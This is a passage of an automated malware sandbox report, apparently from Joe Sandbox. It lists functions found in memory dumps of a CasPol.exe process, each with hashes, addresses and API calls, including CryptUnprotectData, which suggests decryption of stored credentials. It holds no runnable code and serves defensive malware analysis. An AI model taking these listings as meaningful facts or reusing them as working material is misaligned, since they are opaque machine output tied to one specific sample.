                                                                                      Function 012790C8 Relevance: 3.0, Instructions: 2985COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d9bc88e65982beb234f269eac81eee41ccca7fa9d33fb01313526536e85ec0f5
                                                                                      • Instruction ID: a2bdd1b78419e328901dfad05a522c1ce0027d450522525aadd74db3967ecaa8
                                                                                      • Opcode Fuzzy Hash: d9bc88e65982beb234f269eac81eee41ccca7fa9d33fb01313526536e85ec0f5
                                                                                      • Instruction Fuzzy Hash: E9631E31D1075A8ECB11EF68C884699F7B1FF99310F15D69AE55C6B221EB30AAC4CF81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01278C20 Relevance: 2.9, Instructions: 2887COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e75cccdf1417694984d9a7a29cdf9ca5684f86265b6d605b732f95b9dba09071
                                                                                      • Instruction ID: 66d2d5eb01e9f189b4c265dc17191167a052cf3593567cefcca275ac52da59a9
                                                                                      • Opcode Fuzzy Hash: e75cccdf1417694984d9a7a29cdf9ca5684f86265b6d605b732f95b9dba09071
                                                                                      • Instruction Fuzzy Hash: 9D63EA30D10A5A8ECB11EF68C884699F7B1FF99310F15D79AE55C67221EB70AAC4CF81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046950 Relevance: 2.5, APIs: 1, Instructions: 984libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7aeeed58cf6dc500a809573f3fabe3564c4b82f24bb975119ae1f861c0563bee
                                                                                      • Instruction ID: 923bd61599237472aa72c1fa349c79c0e77f708040032efffa2ecb3398337028
                                                                                      • Opcode Fuzzy Hash: 7aeeed58cf6dc500a809573f3fabe3564c4b82f24bb975119ae1f861c0563bee
                                                                                      • Instruction Fuzzy Hash: 46A219B4A01224CFCB65EF64C88879DBBB6BF88305F5084EAD50AA3344DB355E85CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01768F70 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 713edcb7d19a9d2a19b20e008ebac9bd8bb9766df0f7177dcfec91f35820ae20
                                                                                      • Instruction ID: 55e973dbe655b94a0c024e2ad9d3f25580d6e117a516fcf29f4c0c11e3c5e465
                                                                                      • Opcode Fuzzy Hash: 713edcb7d19a9d2a19b20e008ebac9bd8bb9766df0f7177dcfec91f35820ae20
                                                                                      • Instruction Fuzzy Hash: 12F18030A00219CFDB14CFA9C944B9DFBF5BF88308F158159DA19AF2A1DB75E945CB41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0111255C Relevance: 1.6, APIs: 1, Instructions: 122threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • TerminateThread.KERNEL32(6B396C6F,D9A09985), ref: 0111263C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926261275.0000000001112000.00000040.00000400.00020000.00000000.sdmp, Offset: 01112000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1112000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: TerminateThread
                                                                                      • String ID:
                                                                                      • API String ID: 1852365436-0
                                                                                      • Opcode ID: 4d178bd6388eebd7b79305f4f2d12fbf351e8d7b9a909f5c2992593214f6445c
                                                                                      • Instruction ID: c8c0374d691a919535ffc4cc5aac6a93399e000cdd995da69fc4a02d8626def7
                                                                                      • Opcode Fuzzy Hash: 4d178bd6388eebd7b79305f4f2d12fbf351e8d7b9a909f5c2992593214f6445c
                                                                                      • Instruction Fuzzy Hash: B441F8757043029FDF38DE28C5A47DB73E29F95760F698079DC498B16AE3358485CA06
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 015134F9 Relevance: 1.6, APIs: 1, Instructions: 57encryptionCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 01513565
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptDataUnprotect
                                                                                      • String ID:
                                                                                      • API String ID: 834300711-0
                                                                                      • Opcode ID: d8c5baaaff8e216d9034cc0e0998910cc00e085eab62879fb34bb7c8a566a2a1
                                                                                      • Instruction ID: 2e6ecba3c04440a1b2faaddac5f68a1b202608186e6274bdea20a4f3a82f5946
                                                                                      • Opcode Fuzzy Hash: d8c5baaaff8e216d9034cc0e0998910cc00e085eab62879fb34bb7c8a566a2a1
                                                                                      • Instruction Fuzzy Hash: DD1156B68002099FDB10CF99C844BDEBFF4FF48720F158419E614A7251C339AA50DFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01512E68 Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 01513565
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928440351.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1510000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptDataUnprotect
                                                                                      • String ID:
                                                                                      • API String ID: 834300711-0
                                                                                      • Opcode ID: 028ba85f013d3fffc720f8732b7b8d4d0bb4b97204cd454ef5817e47665afccc
                                                                                      • Instruction ID: e1318fc68ea323e1d4e8f7d96eef167587edd9fd4ac52a3b06b9b41b782f3622
                                                                                      • Opcode Fuzzy Hash: 028ba85f013d3fffc720f8732b7b8d4d0bb4b97204cd454ef5817e47665afccc
                                                                                      • Instruction Fuzzy Hash: E11156B68002499FDB10CF99C844BDEBFF4FF48720F158419EA54AB201C379A950DFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01276BD1 Relevance: .1, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30926583691.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1270000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e915d4604cef61439c919871aa1764bc39a1ed7c0ea44a7f6a11d993e03ea881
                                                                                      • Instruction ID: 6806c038f0aa409df3e7590e31d05d20f9c5d89a4e01e6cdd1bda1276941ed1b
                                                                                      • Opcode Fuzzy Hash: e915d4604cef61439c919871aa1764bc39a1ed7c0ea44a7f6a11d993e03ea881
                                                                                      • Instruction Fuzzy Hash: C9112B35B002299FCB40DBBCC8895AEB7F5FB8C3517108469E51AD3710EF396D168B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 1D7AA308 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32 ref: 1D7AA386
                                                                                      • GetCurrentThread.KERNEL32 ref: 1D7AA3C3
                                                                                      • GetCurrentProcess.KERNEL32 ref: 1D7AA400
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1D7AA459
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30950946220.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1d7a0000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2063062207-0
                                                                                      • Opcode ID: 6f8ac1db278ff9be4dfc285962cb41a1d99d07dbef4324e6f1b63749e06439e8
                                                                                      • Instruction ID: 837c31c0753a5482d9c1dc5898afa42a2dcf06b5f9ed8a62dc88156322b33191
                                                                                      • Opcode Fuzzy Hash: 6f8ac1db278ff9be4dfc285962cb41a1d99d07dbef4324e6f1b63749e06439e8
                                                                                      • Instruction Fuzzy Hash: 4D518CB0D00609CFDB00DFA9C588BEEBBF0AF48314F248519E119A7350D73AA944CF66
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01768BB0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 185comCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 119 1768bb0-1768bc7 120 1768d0c-1768dba OleInitialize 119->120 121 1768bcd-1768c02 119->121 140 1768dc3-1768de0 120->140 141 1768dbc-1768dc2 120->141 126 1768c04-1768c07 121->126 127 1768c1c 121->127 128 1768d07 126->128 129 1768c0d-1768c1a 126->129 131 1768c1f-1768c23 127->131 128->120 129->131 132 1768c34 131->132 133 1768c25-1768c32 131->133 136 1768c39-1768c3b 132->136 133->136 137 1768c3d-1768c47 136->137 138 1768c49-1768c59 136->138 137->138 144 1768c67-1768c7b 138->144 145 1768c5b-1768c65 138->145 141->140 150 1768cbf-1768cd2 144->150 151 1768c7d 144->151 145->144 154 1768cd4-1768ce7 150->154 155 1768cfd-1768d04 150->155 152 1768c80-1768ca6 151->152 166 1768ca8 call 1769760 152->166 167 1768ca8 call 1769751 152->167 164 1768ce9 call 1768bb0 154->164 165 1768ce9 call 1768a50 154->165 159 1768cef-1768cf3 159->128 161 1768cf5-1768cfb 159->161 161->154 161->155 162 1768cae-1768cb2 162->128 163 1768cb4-1768cbd 162->163 163->150 163->152 164->159 165->159 166->162 167->162
                                                                                      APIs
                                                                                      • OleInitialize.OLE32(00000000), ref: 01768DAD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30928978761.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1760000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID: \
                                                                                      • API String ID: 2538663250-2967466578
                                                                                      • Opcode ID: c4c73d25e67b854d0fb84671073500b354fdeabd10f88bb8505e4da1fc831c10
                                                                                      • Instruction ID: 9ab13a2a99570e679ede5290fbab80c0e87c9803d625e888e7b6e1602e9b0c61
                                                                                      • Opcode Fuzzy Hash: c4c73d25e67b854d0fb84671073500b354fdeabd10f88bb8505e4da1fc831c10
                                                                                      • Instruction Fuzzy Hash: DF618C74A00319CFDB10CFA9C844AAFBBFAAF88314F158469D915AB340D735E945CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046971 Relevance: 2.1, APIs: 1, Instructions: 637libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 1ce384aa722c6393974fd872902902edd9ac23fb382c5364a814b82060818b22
                                                                                      • Instruction ID: c7334c6ae5ffda943196a8cd0864e9b32d06a547f9ae0d2100632867b74f1b0c
                                                                                      • Opcode Fuzzy Hash: 1ce384aa722c6393974fd872902902edd9ac23fb382c5364a814b82060818b22
                                                                                      • Instruction Fuzzy Hash: 92623AB4A01328CFCB65EF64C98869DBBB6BF88305F5084EAD50AA3344DB355E91CF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 010469B8 Relevance: 2.1, APIs: 1, Instructions: 630libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: eeaf8d68bbf7cf143f35404739d1ca16f7fcedaeb8ee92cc539c16ae0c5c1c14
                                                                                      • Instruction ID: 56656ac270a05f4685560ce1dc3795654253987d3fe3030ad2253ca950ceea87
                                                                                      • Opcode Fuzzy Hash: eeaf8d68bbf7cf143f35404739d1ca16f7fcedaeb8ee92cc539c16ae0c5c1c14
                                                                                      • Instruction Fuzzy Hash: 10623AB4A01328CFCB65EF64C98869DBBB6BF88305F5084EAD50AA3344DB355E91CF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 010469FF Relevance: 2.1, APIs: 1, Instructions: 623libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: d740b00588acb7d35cff14fa2d51250e1f67be15b53a4df20873ed1e020865af
                                                                                      • Instruction ID: 2cb0ac96d4bf4ce29335ae6fe5e8755bfd49fe35af23199dc6f670b44324852c
                                                                                      • Opcode Fuzzy Hash: d740b00588acb7d35cff14fa2d51250e1f67be15b53a4df20873ed1e020865af
                                                                                      • Instruction Fuzzy Hash: 23623AB4A01328CFCB65EF64C98869DBBB6BF88305F5084EAD50AA3344DB355E91CF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046A46 Relevance: 2.1, APIs: 1, Instructions: 616libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 2b135ac41fcd4168cc43c04a18a23ad44b903fb8ac5c8a920d5ffd7b20dab69c
                                                                                      • Instruction ID: 70d8096b74e2aa26e20bf23ee9e46ead6782f7ce978795c7215a1157fe6e2008
                                                                                      • Opcode Fuzzy Hash: 2b135ac41fcd4168cc43c04a18a23ad44b903fb8ac5c8a920d5ffd7b20dab69c
                                                                                      • Instruction Fuzzy Hash: 2B523AB4A01328CFCB65EF64C88869DBBB6BF88305F5084EAD50AA3344DB355E91CF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046A8D Relevance: 2.1, APIs: 1, Instructions: 609libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 0a07ccc1286ca723d084846ab62040c6eb5cddb9d5788bfdf9a761753f28a7eb
                                                                                      • Instruction ID: 9c50edf981adf87abe831bd84055da4ed90004fb217ed204a0befa16c854ca63
                                                                                      • Opcode Fuzzy Hash: 0a07ccc1286ca723d084846ab62040c6eb5cddb9d5788bfdf9a761753f28a7eb
                                                                                      • Instruction Fuzzy Hash: 94523AB4A01328CFCB65EF64C98869DBBB6BF88305F5084EAD50AA3344DB355E91CF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046AD4 Relevance: 2.1, APIs: 1, Instructions: 602libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: de7e477de0f012dcbaa07a1d7d78057cfd015d0c1bde527cfd4b5841d5d3fbfc
                                                                                      • Instruction ID: f25b656537368d0ac50ea4b1f5314891ac60b9035245d57ace1771ce113e1ad2
                                                                                      • Opcode Fuzzy Hash: de7e477de0f012dcbaa07a1d7d78057cfd015d0c1bde527cfd4b5841d5d3fbfc
                                                                                      • Instruction Fuzzy Hash: 5C523AB4A00328CFCB65EF64C98869DBBB6BF88305F5084EAD50AA3344DB355E91CF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046B1B Relevance: 2.1, APIs: 1, Instructions: 595libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: d377e20742bc2d9c026b89e5d02f0fb17cb5dbf6489872de241597b445e93d62
                                                                                      • Instruction ID: 574ecfa2a83cc12d5ac219809005d7789596baf60eeab8cb57b1b2b8e190c847
                                                                                      • Opcode Fuzzy Hash: d377e20742bc2d9c026b89e5d02f0fb17cb5dbf6489872de241597b445e93d62
                                                                                      • Instruction Fuzzy Hash: 3F523AB4A01328CFCB65EF64C98869DBBB6BF88305F5084EAD50AA3344DB355E91CF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046B62 Relevance: 2.1, APIs: 1, Instructions: 588libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: f4914b7dc6fdcfb7da5518e8471f596dc455ab2b571b355dcb99be38564a2bac
                                                                                      • Instruction ID: 9bc90c928e35e27ad244bddcb40b516c4cba9622d74aa108eb66d9998ce05074
                                                                                      • Opcode Fuzzy Hash: f4914b7dc6fdcfb7da5518e8471f596dc455ab2b571b355dcb99be38564a2bac
                                                                                      • Instruction Fuzzy Hash: B9523AB4A00328CFCB65DF64C98869DBBB6BF88305F5084EAD50AA3344DB355E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046BA9 Relevance: 2.1, APIs: 1, Instructions: 581libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 10ea04f820e49b8e371020df755fc7fae566dbc227b67125d0f6df4d20c6d176
                                                                                      • Instruction ID: 780e356b84b26f7658aaa20bb1f5f90bd308ea48315769de6f316fedbb8cdcb4
                                                                                      • Opcode Fuzzy Hash: 10ea04f820e49b8e371020df755fc7fae566dbc227b67125d0f6df4d20c6d176
                                                                                      • Instruction Fuzzy Hash: 6E523AB4A00328CFCB65DF64C98869DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046BF0 Relevance: 2.1, APIs: 1, Instructions: 574libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: ccf0a86f2707eeb01501dc81ffae8d1c868fd29e745afde3ec06689b32086357
                                                                                      • Instruction ID: 7e1b8d24b691bd03b47ebdee2d14f47c8bf45549bfaa64f1f7784508cd610035
                                                                                      • Opcode Fuzzy Hash: ccf0a86f2707eeb01501dc81ffae8d1c868fd29e745afde3ec06689b32086357
                                                                                      • Instruction Fuzzy Hash: F9522AB4A00328CFCB65DF64C98869DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046C37 Relevance: 2.1, APIs: 1, Instructions: 565libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 74b771127310a0ef2644efee22c5ca94f35da46911bffb81aac495be1bb3d298
                                                                                      • Instruction ID: cf68e25a1e606ef6d85adb628ab4e9644f1b549857a5fde93de04f80045d4a1a
                                                                                      • Opcode Fuzzy Hash: 74b771127310a0ef2644efee22c5ca94f35da46911bffb81aac495be1bb3d298
                                                                                      • Instruction Fuzzy Hash: 54423AB4A00224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046C75 Relevance: 2.1, APIs: 1, Instructions: 560libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 8ac709a2b6a22b52730eab54dbb9fdd7abca586fc741d9a07e888ddbd2cd0133
                                                                                      • Instruction ID: 627e8e7173e7c146778dde0f05d85fd5e0f77c7a3ec1a33db87893c382ecd242
                                                                                      • Opcode Fuzzy Hash: 8ac709a2b6a22b52730eab54dbb9fdd7abca586fc741d9a07e888ddbd2cd0133
                                                                                      • Instruction Fuzzy Hash: E34229B4A00324CFCB65EF64C98869DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046CBC Relevance: 2.1, APIs: 1, Instructions: 553libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 3fa1c7fcea5a4bc60e59357432a4a7469cfd17fdba4cbf1cc57c5e4a8c802ac7
                                                                                      • Instruction ID: d747dc991b1ff3989e1c86aab61eaffa7ba55cfeab489b0a4588dacb1c355f00
                                                                                      • Opcode Fuzzy Hash: 3fa1c7fcea5a4bc60e59357432a4a7469cfd17fdba4cbf1cc57c5e4a8c802ac7
                                                                                      • Instruction Fuzzy Hash: D64239B4A00224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E81CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046D03 Relevance: 2.0, APIs: 1, Instructions: 546libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 4abbeb40107158d73c5c50a6d353acf56a71ae2d27a8861a251312c27ea08c8b
                                                                                      • Instruction ID: 4e30a348766a70c0540483595d4856e9edcfdf8b98f6dc205920e59641622ff8
                                                                                      • Opcode Fuzzy Hash: 4abbeb40107158d73c5c50a6d353acf56a71ae2d27a8861a251312c27ea08c8b
                                                                                      • Instruction Fuzzy Hash: 794229B4A00224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046D4A Relevance: 2.0, APIs: 1, Instructions: 537libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.30925650450.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_1040000_CasPol.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 3d5ab2d6e273ad303d59384e4070ecf18e9d2e63ad18c0a1a85756e952683887
                                                                                      • Instruction ID: 06a76c2f74e543f60d5c3e3627c13634ffcabc28b3eeeecf563a47cda9d303e1
                                                                                      • Opcode Fuzzy Hash: 3d5ab2d6e273ad303d59384e4070ecf18e9d2e63ad18c0a1a85756e952683887
                                                                                      • Instruction Fuzzy Hash: 9E4238B4A00224CFCB65EF64C98879DBBB6BF88305F5084EAD50AA3344DB359E91CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01046D88 Relevance: 2.0, APIs: 1, Instructions: 532libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
